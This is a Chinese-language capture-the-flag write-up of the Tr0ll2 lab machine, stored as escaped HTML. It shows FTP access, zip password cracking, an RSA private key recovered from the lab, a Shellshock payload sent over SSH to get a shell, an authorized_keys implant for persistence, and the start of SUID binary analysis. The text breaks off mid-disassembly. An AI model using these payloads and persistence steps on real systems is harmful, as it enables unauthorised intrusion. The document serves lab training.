\u6ca1\u53d1\u73b0\u5565\u4e1c\u897f\uff0c\u53ea\u6709\u4e00\u5f20\u56fe\u7247\uff0c\u7b49\u4e0b\u6ca1\u601d\u8def\u53ef\u4ee5\u770b\u770b\u6709\u6ca1\u6709\u4ec0\u4e48\u9690\u85cf\u6587\u4ef6\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u6398<\/h2>\n\u5c1d\u8bd5ftp\u767b\u5f55<\/h3>\n
\u8d26\u53f7\u5bc6\u7801\u5747\u4f7f\u7528Tr0ll<\/code>:<\/p>\nConnected to 10.161.61.134.\n220 Welcome to Tr0ll FTP... Only noobs stay for a while...\nName (10.161.61.134:kali): Tr0ll\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||32246|).\n150 Here comes the directory listing.\n-rw-r--r-- 1 0 0 1474 Oct 04 2014 lmao.zip\n226 Directory send OK.\nftp> get lmao.zip\nlocal: lmao.zip remote: lmao.zip\n229 Entering Extended Passive Mode (|||19663|).\n150 Opening BINARY mode data connection for lmao.zip (1474 bytes).\n100% |**************************************************************| 1474 2.95 MiB\/s 00:00 ETA\n226 Transfer complete.\n1474 bytes received in 00:00 (1.02 MiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n\u67e5\u770b\u654f\u611f\u6587\u4ef6<\/h3>\n
\u5148\u67e5\u770b\u4e00\u4e0b\u6587\u4ef6\u662f\u5565\uff0c\u53d1\u73b0\u662f\u538b\u7f29\u5305\uff0c\u89e3\u538b\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ file lmao.zip \nlmao.zip: Zip archive data, at least v2.0 to extract, compression method=deflate\n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ unzip lmao.zip \nArchive: lmao.zip\n[lmao.zip] noob password: \npassword incorrect--reenter: \npassword incorrect--reenter: \n skipping: noob incorrect password<\/code><\/pre>\n\u731c\u60f3\u662f\u4e0d\u662f\u4f2a\u52a0\u5bc6\uff0c\u5c1d\u8bd5\u62ff\u51fa\u6765\u770b\u4e00\u4e0b\uff1a<\/p>\n
\n\u53ef\u4ee5\u53c2\u8003\uff1ahttps:\/\/blog.csdn.net\/Goodric\/article\/details\/117599617<\/a><\/p>\n<\/blockquote>\n<\/div>
\n<\/div><\/p>\n\u5c1d\u8bd5\u7206\u7834\uff0c\u672a\u679c<\/h3>\n
\u8fd8\u771f\u52a0\u5bc6\u4e86\uff0c\u628a\u521a\u521a\u7684\u76ee\u5f55\u7206\u7834\u4e00\u4e0b\uff1a\u5b57\u5178\u5c31\u8bbe\u4e3arobots.txt<\/code>\u52a0\u4e0arobots.txt\u91cc\u7684\u5185\u5bb9<\/code>\uff1a<\/p>\nsed 's\/\\\/\/\/g' temp.txt >> temp.txt<\/code><\/pre>\n\/robots.txt\n\/noob\n\/nope\n\/try_harder\n\/keep_trying\n\/isnt_this_annoying\n\/nothing_here\n\/404\n\/LOL_at_the_last_one\n\/trolling_is_fun\n\/zomg_is_this_it\n\/you_found_me\n\/I_know_this_sucks\n\/You_could_give_up\n\/dont_bother\n\/will_it_ever_end\n\/I_hope_you_scripted_this\n\/ok_this_is_it\n\/stop_whining\n\/why_are_you_still_looking\n\/just_quit\n\/seriously_stop\nrobots.txt\nnoob\nnope\ntry_harder\nkeep_trying\nisnt_this_annoying\nnothing_here\n404\nLOL_at_the_last_one\ntrolling_is_fun\nzomg_is_this_it\nyou_found_me\nI_know_this_sucks\nYou_could_give_up\ndont_bother\nwill_it_ever_end\nI_hope_you_scripted_this\nok_this_is_it\nstop_whining\nwhy_are_you_still_looking\njust_quit\nseriously_stop<\/code><\/pre>\n\u8fdb\u884c\u7206\u7834\uff0c\u4f46\u662f\u6ca1\u627e\u5230\u5bc6\u7801\u3002<\/p>\n
\u7ee7\u7eed\u4fe1\u606f\u641c\u96c6\u3002<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h2>\nFUZZ<\/h3>\n
\u521a\u521a\u67e5\u770b\u7684\u65f6\u5019\u53d1\u73b0\u6709\u7684\u76ee\u5f55\u65e0\u6cd5\u6253\u5f00\u6709\u7684\u5219\u6709\u7167\u7247\uff0cfuzz\u4e00\u4e0b\uff0c\u770b\u770b\u54ea\u4e9b\u5728\u4f7f\u7528\uff1a<\/p>\n
wfuzz -c --hc 404 -w temp.txt http:\/\/10.161.61.134\/FUZZ<\/code><\/pre>\n<\/div><\/p>\n\u5e94\u8be5\u90fd\u662f\u540c\u4e00\u5f20\u7167\u7247\uff0c\u73b0\u5728\u4e5f\u6ca1\u5176\u4ed6\u8def\u5b50\u4e86\uff0c\u5c1d\u8bd5\u4e0b\u8f7d\u4e0b\u6765\u67e5\u770b\u4e00\u4e0b<\/p>\n
\u9690\u5199\u5206\u6790<\/h3>\n
\u5168\u90e8\u4e0b\u8f7d\u4e0b\u6765\u4ee5\u540e\uff0c\u770b\u5230\u5927\u5c0f\u6709\u533a\u522b\uff1a<\/p>\n
wget http:\/\/10.161.61.134\/ok_this_is_it\/cat_the_troll.jpg -O tr0ll1.jpg # \u8f93\u9519\u4e86\uff0c\u4f46\u662f\u4e5f\u6b63\u5e38\u4e0b\u8f7d\u4e86\nwget http:\/\/10.161.61.134\/dont_bother\/cat_the_troll.jpg -O tr0ll2.jpg\nwget http:\/\/10.161.61.134\/keep_trying\/cat_the_troll.jpg -O tr0ll3.jpg\nwget http:\/\/10.161.61.134\/noob\/cat_the_troll.jpg -O tr0ll4.jpg<\/code><\/pre>\n\u67e5\u770b\u5927\u5c0f\uff0c\u53d1\u73b0\u6709\u4e00\u4e2a\u5927\u5c0f\u4e0d\u4e00\u6837\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Tr0ll]\n\u2514\u2500$ ls -l *.jpg \n-rw-r--r-- 1 kali kali 15831 Oct 4 2014 tr0ll1.jpg\n-rw-r--r-- 1 kali kali 15873 Oct 4 2014 tr0ll2.jpg\n-rw-r--r-- 1 kali kali 15831 Oct 4 2014 tr0ll3.jpg\n-rw-r--r-- 1 kali kali 15831 Oct 4 2014 tr0ll4.jpg<\/code><\/pre>\n\u8fdb\u884c\u5206\u6790\uff1a<\/p>\n
strings tr0ll2.jpg<\/code><\/pre>\n\u53d1\u73b0\u6709\u4e00\u4e2a\u63d0\u793a\uff1a<\/p>\n
Look Deep within y0ur_self for the answer<\/code><\/pre>\n\u67e5\u770b\u63d0\u793a<\/h3>\n
\u6253\u5f00\u770b\u4e00\u4e0b\u8fd9\u4e2a\u76ee\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u6253\u5f00\u53d1\u73b0\u662f\u4e00\u4e2a\u5b57\u5178\uff1a<\/p>\n
<\/div><\/p>\n\u4e00\u770b\u5c31\u662fbase64\u7f16\u7801\u7684\uff0c\u4e0d\u8fc7\u4e5f\u5f97\u5c0f\u5fc3\u88ab\u4f5c\u8005\u7ed9\u516d\u4e86\uff0c\u8fdb\u884c\u89e3\u7801\u4ee5\u540e\u653e\u8fdb\u8fd9\u4e2a\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
wget http:\/\/10.161.61.134\/y0ur_self\/answer.txt\nbase64 -d answer.txt > answer2.txt\nfcrackzip -u -D -p answer.txt lmao.zip\nfcrackzip -u -D -p answer2.txt lmao.zip<\/code><\/pre>\n\n-u<\/code>: \u8fd9\u4e2a\u9009\u9879\u544a\u8bc9fcrackzip<\/code>\u53ea\u5c1d\u8bd5\u7834\u89e3\u52a0\u5bc6ZIP\u6587\u4ef6\u7684\u5bc6\u7801\uff0c\u800c\u4e0d\u662f\u89e3\u538b\u7f29\u6587\u4ef6\u3002\u5982\u679c\u4e0d\u4f7f\u7528\u8fd9\u4e2a\u9009\u9879\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u5b83\u4f1a\u5c1d\u8bd5\u89e3\u538b\u7f29\u6587\u4ef6\u3002<\/li>\n-D<\/code>: \u8fd9\u4e2a\u9009\u9879\u544a\u8bc9fcrackzip<\/code>\u4f7f\u7528\u5b57\u5178\u653b\u51fb\u3002\u5b83\u4f1a\u5c1d\u8bd5\u4f7f\u7528\u6307\u5b9a\u7684\u5b57\u5178\u6587\u4ef6\u4e2d\u7684\u5355\u8bcd\u4f5c\u4e3a\u5bc6\u7801\u6765\u89e3\u9501ZIP\u6587\u4ef6\u3002<\/li>\n-p answer.txt<\/code>: \u8fd9\u4e2a\u9009\u9879\u6307\u5b9a\u4e86\u5b57\u5178\u6587\u4ef6\u7684\u8def\u5f84\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0canswer.txt<\/code>\u662f\u4f60\u5e0c\u671bfcrackzip<\/code>\u4f7f\u7528\u7684\u5b57\u5178\u6587\u4ef6\u7684\u8def\u5f84\u3002<\/li>\nlmao.zip<\/code>: \u8fd9\u662f\u8981\u7834\u89e3\u7684ZIP\u6587\u4ef6\u7684\u540d\u79f0\u3002\u4f60\u9700\u8981\u5c06\u8fd9\u4e2a\u53c2\u6570\u66ff\u6362\u4e3a\u4f60\u8981\u5c1d\u8bd5\u7834\u89e3\u7684\u5b9e\u9645ZIP\u6587\u4ef6\u7684\u8def\u5f84\u548c\u540d\u79f0\u3002<\/li>\n<\/ul>\n\u53d1\u73b0\u5bc6\u7801\uff1a<\/p>\n
PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL<\/code><\/pre>\n\u5bb3\uff0c\u8001\u8bdd\u8bf4\u7684\u679c\u7136\u6ca1\u9519\uff0c\u6e17\u900f\u6d4b\u8bd5\u6700\u7ec8\u8fd8\u662f\u4fe1\u606f\u641c\u96c6\u3002\u3002\u3002\u3002<\/p>\n
\u67e5\u770b\u4e00\u4e0b\u6709\u5565\u6d88\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Tr0ll]\n\u2514\u2500$ unzip lmao.zip\nArchive: lmao.zip\n[lmao.zip] noob password: \n inflating: noob \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Tr0ll]\n\u2514\u2500$ ls \nanswer2.txt answer.txt lmao.zip noob temp.txt tr0ll1.jpg tr0ll2.jpg tr0ll3.jpg tr0ll4.jpg\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Tr0ll]\n\u2514\u2500$ cat noob \n-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAsIthv5CzMo5v663EMpilasuBIFMiftzsr+w+UFe9yFhAoLqq\nyDSPjrmPsyFePcpHmwWEdeR5AWIv\/RmGZh0Q+Qh6vSPswix7\/\/SnX\/QHvh0CGhf1\n\/9zwtJSMely5oCGOujMLjDZjryu1PKxET1CcUpiylr2kgD\/fy11Th33KwmcsgnPo\nq+pMbCh86IzNBEXrBdkYCn222djBaq+mEjvfqIXWQYBlZ3HNZ4LVtG+5in9bvkU5\nz+13lsTpA9px6YIbyrPMMFzcOrxNdpTY86ozw02+MmFaYfMxyj2GbLej0+qniwKy\ne5SsF+eNBRKdqvSYtsVE11SwQmF4imdJO0buvQIDAQABAoIBAA8ltlpQWP+yduna\nu+W3cSHrmgWi\/Ge0Ht6tP193V8IzyD\/CJFsPH24Yf7rX1xUoIOKtI4NV+gfjW8i0\ngvKJ9eXYE2fdCDhUxsLcQ+wYrP1j0cVZXvL4CvMDd9Yb1JVnq65QKOJ73CuwbVlq\nUmYXvYHcth324YFbeaEiPcN3SIlLWms0pdA71Lc8kYKfgUK8UQ9Q3u58Ehlxv079\nLa35u5VH7GSKeey72655A+t6d1ZrrnjaRXmaec\/j3Kvse2GrXJFhZ2IEDAfa0GXR\nxgl4PyN8O0L+TgBNI\/5nnTSQqbjUiu+aOoRCs0856EEpfnGte41AppO99hdPTAKP\naq\/r7+UCgYEA17OaQ69KGRdvNRNvRo4abtiKVFSSqCKMasiL6aZ8NIqNfIVTMtTW\nK+WPmz657n1oapaPfkiMRhXBCLjR7HHLeP5RaDQtOrNBfPSi7AlTPrRxDPQUxyxx\nn48iIflln6u85KYEjQbHHkA3MdJBX2yYFp\/w6pYtKfp15BDA8s4v9HMCgYEA0YcB\nTEJvcW1XUT93ZsN+lOo\/xlXDsf+9Njrci+G8l7jJEAFWptb\/9ELc8phiZUHa2dIh\nWBpYEanp2r+fKEQwLtoihstceSamdrLsskPhA4xF3zc3c1ubJOUfsJBfbwhX1tQv\nibsKq9kucenZOnT\/WU8L51Ni5lTJa4HTQwQe9A8CgYEAidHV1T1g6NtSUOVUCg6t\n0PlGmU9YTVmVwnzU+LtJTQDiGhfN6wKWvYF12kmf30P9vWzpzlRoXDd2GS6N4rdq\nvKoyNZRw+bqjM0XT+2CR8dS1DwO9au14w+xecLq7NeQzUxzId5tHCosZORoQbvoh\nywLymdDOlq3TOZ+CySD4\/wUCgYEAr\/ybRHhQro7OVnneSjxNp7qRUn9a3bkWLeSG\nth8mjrEwf\/b\/1yai2YEHn+QKUU5dCbOLOjr2We\/Dcm6cue98IP4rHdjVlRS3oN9s\nG9cTui0pyvDP7F63Eug4E89PuSziyphyTVcDAZBriFaIlKcMivDv6J6LZTc17sye\nq51celUCgYAKE153nmgLIZjw6+FQcGYUl5FGfStUY05sOh8kxwBBGHW4\/fC77+NO\nvW6CYeE+bA2AQmiIGj5CqlNyecZ08j4Ot\/W3IiRlkobhO07p3nj601d+OgTjjgKG\nzp8XZNG8Xwnd5K59AVXZeiLe2LGeYbUKGbHyKE3wEVTTEmgaxF4D1g==\n-----END RSA PRIVATE KEY-----\n<\/code><\/pre>\n\u662f\u4e00\u4e2a\u79c1\u94a5\uff0cnice\uff01\uff01<\/p>\n
\u83b7\u53d6\u7528\u6237<\/h2>\nssh\u767b\u5f55shellShock<\/h3>\nssh noob@10.161.61.134 -i noob<\/code><\/pre>\n\u4f46\u662f\u8fd8\u662f\u9700\u8981\u5bc6\u7801\uff0c\u79bb\u8c31\uff1a<\/p>\n
ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i noob noob@10.161.61.134 <\/code><\/pre>\n\u8fdb\u53bb\u4e86\uff0c\u53c8\u597d\u50cf\u6ca1\u8fdb\u53bb\uff1a<\/p>\n
TRY HARDER LOL!\nConnection to 10.161.61.134 closed.<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u53d1\u751f\u4e86\u5565\uff1a<\/p>\n
ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i noob noob@10.161.61.134 -v<\/code><\/pre>\nOpenSSH_9.6p1 Debian-3, OpenSSL 3.1.4 24 Oct 2023\ndebug1: Reading configuration data \/etc\/ssh\/ssh_config\ndebug1: \/etc\/ssh\/ssh_config line 19: include \/etc\/ssh\/ssh_config.d\/*.conf matched no files\ndebug1: \/etc\/ssh\/ssh_config line 21: Applying options for *\ndebug1: Connecting to 10.161.61.134 [10.161.61.134] port 22.\ndebug1: Connection established.\ndebug1: identity file noob type -1\ndebug1: identity file noob-cert type -1\ndebug1: Local version string SSH-2.0-OpenSSH_9.6p1 Debian-3\ndebug1: Remote protocol version 2.0, remote software version OpenSSH_5.9p1 Debian-5ubuntu1.4\ndebug1: compat_banner: match: OpenSSH_5.9p1 Debian-5ubuntu1.4 pat OpenSSH_5* compat 0x0c000002\ndebug1: Authenticating to 10.161.61.134:22 as 'noob'\ndebug1: load_hostkeys: fopen \/home\/kali\/.ssh\/known_hosts2: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts2: No such file or directory\ndebug1: SSH2_MSG_KEXINIT sent\ndebug1: SSH2_MSG_KEXINIT received\ndebug1: kex: algorithm: ecdh-sha2-nistp256\ndebug1: kex: host key algorithm: ecdsa-sha2-nistp256\ndebug1: kex: server->client cipher: aes128-ctr MAC: umac-64@openssh.com compression: none\ndebug1: kex: client->server cipher: aes128-ctr MAC: umac-64@openssh.com compression: none\ndebug1: expecting SSH2_MSG_KEX_ECDH_REPLY\ndebug1: SSH2_MSG_KEX_ECDH_REPLY received\ndebug1: Server host key: ecdsa-sha2-nistp256 SHA256:I3xuSgcBlIsoldKTkOyVYwx8B4NLGl0fDDTi0H6ExYg\ndebug1: load_hostkeys: fopen \/home\/kali\/.ssh\/known_hosts2: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts2: No such file or directory\ndebug1: Host '10.161.61.134' is known and matches the ECDSA host key.\ndebug1: Found key in \/home\/kali\/.ssh\/known_hosts:24\ndebug1: rekey out after 4294967296 blocks\ndebug1: SSH2_MSG_NEWKEYS sent\ndebug1: expecting SSH2_MSG_NEWKEYS\ndebug1: SSH2_MSG_NEWKEYS received\ndebug1: rekey in after 4294967296 blocks\ndebug1: SSH2_MSG_SERVICE_ACCEPT received\ndebug1: Authentications that can continue: publickey,password\ndebug1: Next authentication method: publickey\ndebug1: get_agent_identities: bound agent to hostkey\ndebug1: get_agent_identities: ssh_fetch_identitylist: agent contains no identities\ndebug1: Will attempt key: noob explicit\ndebug1: Trying private key: noob\nAuthenticated to 10.161.61.134 ([10.161.61.134]:22) using "publickey".\ndebug1: channel 0: new session [client-session] (inactive timeout: 0)\ndebug1: Requesting no-more-sessions@openssh.com\ndebug1: Entering interactive session.\ndebug1: pledge: filesystem\ndebug1: Remote: Forced command. \/\/\u6240\u4ee5\u662f\u53ef\u4ee5\u6267\u884c\u7684\uff01\uff01\uff01\ndebug1: Sending environment.\ndebug1: channel 0: setting env LANG = "en_US.UTF-8"\ndebug1: client_input_channel_req: channel 0 rtype exit-status reply 0\ndebug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0\nTRY HARDER LOL!\ndebug1: channel 0: free: client-session, nchannels 1\nConnection to 10.161.61.134 closed.\nTransferred: sent 2912, received 1712 bytes, in 0.1 seconds\nBytes per second: sent 52348.4, received 30776.2\ndebug1: Exit status 0<\/code><\/pre>\n\u5c1d\u8bd5\u5f39\u4e00\u4e2ashell\uff1a<\/p>\n
\nshellshock:\u901a\u5e38\uff0c\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u5c06\u5355\u4e2a\u547d\u4ee4\u9644\u52a0\u5230 SSH \u547d\u4ee4\u6765\u901a\u8fc7 SSH \u6267\u884c\u8be5\u547d\u4ee4\u3002\u4f7f\u7528\u5f3a\u5236\u547d\u4ee4\u65f6\uff0c\u9644\u52a0\u547d\u4ee4\u5c06\u88ab\u5ffd\u7565\uff0c\u4f46\u5b83\u5b58\u50a8\u5728 SSH_ORIGINAL_COMMAND \u73af\u5883\u53d8\u91cf\u4e2d \u3002\u7136\u540e\u53ef\u4ee5\u901a\u8fc7\u5728\u539f\u59cb\u547d\u4ee4\u4e2d\u5305\u542b Shellshock \u6709\u6548\u8d1f\u8f7d\u6765\u5229\u7528\u6b64\u529f\u80fd\u3002\u7136\u540e\uff0c\u5728\u8fd0\u884c\u5f3a\u5236\u547d\u4ee4\u4e4b\u524d\uff0c\u6709\u6548\u8d1f\u8f7d\u5c06\u81ea\u52a8\u6267\u884c\u3002<\/p>\n
\u53c2\u8003\uff1ahttps:\/\/github.com\/jeholliday\/shellshock<\/a><\/p>\nhttps:\/\/gabb4r.gitbook.io\/oscp-notes\/web-http\/shellshock<\/a><\/p>\n<\/blockquote>\n$ ssh <user>@<server address> '() { :; }; echo "pwned"'<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i noob noob@10.161.61.134 '() { :; }; echo "pwned"'\n# pwned\n# TRY HARDER LOL!<\/code><\/pre>\n\u8bf4\u660e\u662f\u6709\u8fd9\u4e2a\u6f0f\u6d1e\u7684\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i noob noob@10.161.61.134 '() { :;}; \/bin\/bash'<\/code><\/pre>\n<\/div><\/p>\n\u83b7\u53d6\u5230\u4e86shell\uff0c\u4e0d\u8fc7\u611f\u89c9\u4ea4\u4e92\u6027\u4e0d\u662f\u5f88\u597d\uff0c\u5c1d\u8bd5\u4f20\u4e00\u4e2a\u516c\u94a5\u4e0a\u53bb\uff0c\u5b9e\u73b0ssh\u767b\u5f55\uff1a<\/p>\n
# kali\nssh-keygen -b 2048 -t rsa<\/code><\/pre>\n# noob\necho 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDjqj8kG2CV+EIp0gPIsGtgoFz7zkhFZDzeunBU9PWcQTOaO85F\/LBFxD8+EVkGjSB1CRfQReTlUEmhctbA0xVYFOlHGi94m9otYKS5J8R2xKZEjJklP7YvWyOtm\/XDfNCn5p99J0pZhVfziHvkLLngkRsRCGSrJbP0abmSYtDl3fIC3hOwtxripIZbTuaRGZ2sJpgXIvbr8ObSAKHPcAnkT4f9mJDn+J8umnnsW2LU2okv56QoGyuaIHbNFU9KSMu8N1e48gxSmwFNlOONxynNg9V0m4qzZ4VBPNes2dfupMsuETRZHkV7TcVqAcnud59IW8N\/O+vxZpc6St7Wfaed kali@kali'> .ssh\/authorized_keys<\/code><\/pre>\n\u7136\u540e\u5373\u53ef\u5c1d\u8bd5\u8fdb\u884c\u767b\u9646\uff1a<\/p>\n
ssh noob@10.161.61.134 -i Tr0llssh -o PubkeyAcceptedKeyTypes=ssh-rsa\n# \u8fd9\u91cc\u7684Tr0llssh\u662f\u6211\u7684\u79c1\u94a5\u7684\u540d\u5b57<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u67e5\u770b\u5e38\u89c1\u6f0f\u6d1e\u4ee5\u53ca\u7cfb\u7edf\u4fe1\u606f<\/h3>\n
\u5c3d\u91cf\u4e0d\u5185\u6838\u63d0\u6743\u4e86\uff0c\u6ca1\u5565\u610f\u601d\uff0c\u4e00\u628a\u68ad\u7684\u4e1c\u897f\u3002\u3002<\/p>\n
noob@Tr0ll2:~$ whoami;id\nnoob\nuid=1002(noob) gid=1002(noob) groups=1002(noob)\nnoob@Tr0ll2:~$ uname -a\nLinux Tr0ll2 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU\/Linux\nnoob@Tr0ll2:~$ lsb_release -a\nNo LSB modules are available.\nDistributor ID: Ubuntu\nDescription: Ubuntu 12.04.1 LTS\nRelease: 12.04\nCodename: precise\nnoob@Tr0ll2:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/bin\/su\n\/bin\/umount \n\/bin\/ping\n\/bin\/mount\n\/bin\/fusermount\n\/bin\/ping6\n\/usr\/bin\/chfn\n\/usr\/bin\/at\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudoedit\n\/usr\/bin\/passwd\n\/usr\/bin\/mtr\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/traceroute6.iputils\n\/usr\/bin\/gpasswd\n\/usr\/sbin\/pppd\n\/usr\/sbin\/uuidd\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/vmware-tools\/bin32\/vmware-user-suid-wrapper\n\/usr\/lib\/vmware-tools\/bin64\/vmware-user-suid-wrapper\n\/usr\/lib\/pt_chown\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/nothing_to_see_here\/choose_wisely\/door2\/r00t\n\/nothing_to_see_here\/choose_wisely\/door3\/r00t\n\/nothing_to_see_here\/choose_wisely\/door1\/r00t\nnoob@Tr0ll2:~$ crontab -l\nno crontab for noob<\/code><\/pre>\n\u5c1d\u8bd5sudo su<\/code>\u53ef\u60dc\u6ca1\u5bc6\u7801\u3002<\/p>\n\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u53ef\u7591\u6587\u4ef6r00t<\/code>\uff0c\u4e0d\u51fa\u610f\u5916\u7684\u8bdd\u5e94\u8be5\u5c31\u662f\u6211\u4eec\u9700\u8981\u641e\u5b9a\u7684\u4e1c\u897f\u4e86\uff01<\/p>\nnoob@Tr0ll2:~$ cd \/nothing_to_see_here\/choose_wisely\/door1\/\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ ls\nr00t\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ file\nUsage: file [-bchikLlNnprsvz0] [--apple] [--mime-encoding] [--mime-type]\n [-e testname] [-F separator] [-f namefile] [-m magicfiles] file ...\n file -C [-m magicfiles]\n file [--help]\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ file r00t\nr00t: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU\/Linux 2.6.24, BuildID[sha1]=0x80ac0ab3dd7ab04707b2fec1a7bca030e20e4654, not stripped<\/code><\/pre>\n\u574f\u4e86\uff0c\u53ef\u80fd\u8981\u9760pwn\u4e86\uff01<\/p>\n
pwn r00t<\/h3>\n
\u60f3\u5148\u62ff\u5230\u672c\u5730\u6765\uff1a<\/p>\n
python -m SimpleHTTPServer 8080<\/code><\/pre>\n\u4f46\u662f\uff1a<\/p>\n
<\/div><\/p>\n\u5148\u8fdc\u7a0b\u6d45\u6d45\u5206\u6790\u4e00\u4e0b\u5427\uff0c\u5b9e\u5728\u4e0d\u884c\u7b49\u4e0b\u518d\u62ff\u5230\u672c\u5730\u6765\uff1a<\/p>\n
\u5148\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n
noob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ .\/r00t\n\n2 MINUTE HARD MODE LOL\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ cd ..\/\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely$ cd door2\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door2$ .\/r00t\nUsage: .\/r00t input\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door2$ cd ..\/door3;.\/r00t\nGood job, stand by, executing root shell...\nBUHAHAHA NOOB!\nwhoanoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door3$ whoa\nBroadcast message from noob@Tr0ll2\n (\/dev\/pts\/0) at 4:42 ...\n\nThe system is going down for reboot NOW!\n<\/code><\/pre>\n\u5636\uff0c\u597d\u50cf\u4e00\u8fd0\u884c\u5c31\u4f1a\u5d29\u6389\uff0c\u5206\u6790\u4e00\u4e0b<\/p>\n
strings r00t\n# -bash: \/usr\/bin\/strings: Permission denied\nreadelf -h r00t \/nothing_to_see_here\/choose_wisely\/door2\/r00t\n# readelf: Error: 'r00t': No such file\n# File: \/nothing_to_see_here\/choose_wisely\/door2\/r00t\n# ELF Header:\n# Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 \n# Class: ELF32\n# Data: 2's complement, little endian\n# Version: 1 (current)\n# OS\/ABI: UNIX - System V\n# ABI Version: 0\n# Type: EXEC (Executable file)\n# Machine: Intel 80386\n# Version: 0x1\n# Entry point address: 0x80483b0\n# Start of program headers: 52 (bytes into file)\n# Start of section headers: 4424 (bytes into file)\n# Flags: 0x0\n# Size of this header: 52 (bytes)\n# Size of program headers: 32 (bytes)\n# Number of program headers: 9\n# Size of section headers: 40 (bytes)\n# Number of section headers: 30\n# Section header string table index: 27\nxxd r00t\n# 0000000: 7f45 4c46 0101 0100 0000 0000 0000 0000 .ELF............\n# 0000010: 0200 0300 0100 0000 b083 0408 3400 0000 ............4...\n# 0000020: 4811 0000 0000 0000 3400 2000 0900 2800 H.......4. ...(.\n# 0000030: 1e00 1b00 0600 0000 3400 0000 3480 0408 ........4...4...\n# 0000040: 3480 0408 2001 0000 2001 0000 0500 0000 4... ... .......\n# 0000050: 0400 0000 0300 0000 5401 0000 5481 0408 ........T...T...\n# 0000060: 5481 0408 1300 0000 1300 0000 0400 0000 T...............\n# 0000070: 0100 0000 0100 0000 0000 0000 0080 0408 ................\n# 0000080: 0080 0408 d006 0000 d006 0000 0500 0000 ................\n# 0000090: 0010 0000 0100 0000 140f 0000 149f 0408 ................\n# 00000a0: 149f 0408 0c01 0000 1401 0000 0600 0000 ................\n# 00000b0: 0010 0000 0200 0000 280f 0000 289f 0408 ........(...(...\n# 00000c0: 289f 0408 c800 0000 c800 0000 0600 0000 (...............\n# 00000d0: 0400 0000 0400 0000 6801 0000 6881 0408 ........h...h...\n# 00000e0: 6881 0408 4400 0000 4400 0000 0400 0000 h...D...D.......\n# 00000f0: 0400 0000 50e5 7464 d805 0000 d885 0408 ....P.td........\n..........\n# \u6709\u4e09\u4e2a\u95e8\u90fd\u6709\u8fd9\u4e2ar00t,\u9010\u4e00\u5206\u6790\u5427\ngdb .\/r00t\n# GNU gdb (Ubuntu\/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04\n# Copyright (C) 2012 Free Software Foundation, Inc.\n# License GPLv3+: GNU GPL version 3 or later <http:\/\/gnu.org\/licenses\/gpl.html>\n# This is free software: you are free to change and redistribute it.\n# There is NO WARRANTY, to the extent permitted by law. Type "show copying"\n# and "show warranty" for details.\n# This GDB was configured as "i686-linux-gnu".\n# For bug reporting instructions, please see:\n# <http:\/\/bugs.launchpad.net\/gdb-linaro\/>...\n# Reading symbols from \/nothing_to_see_here\/choose_wisely\/door1\/r00t...done.\n(gdb) disassemble main\n# Dump of assembler code for function main:\n# 0x08048444 <+0>: push %ebp\n# 0x08048445 <+1>: mov 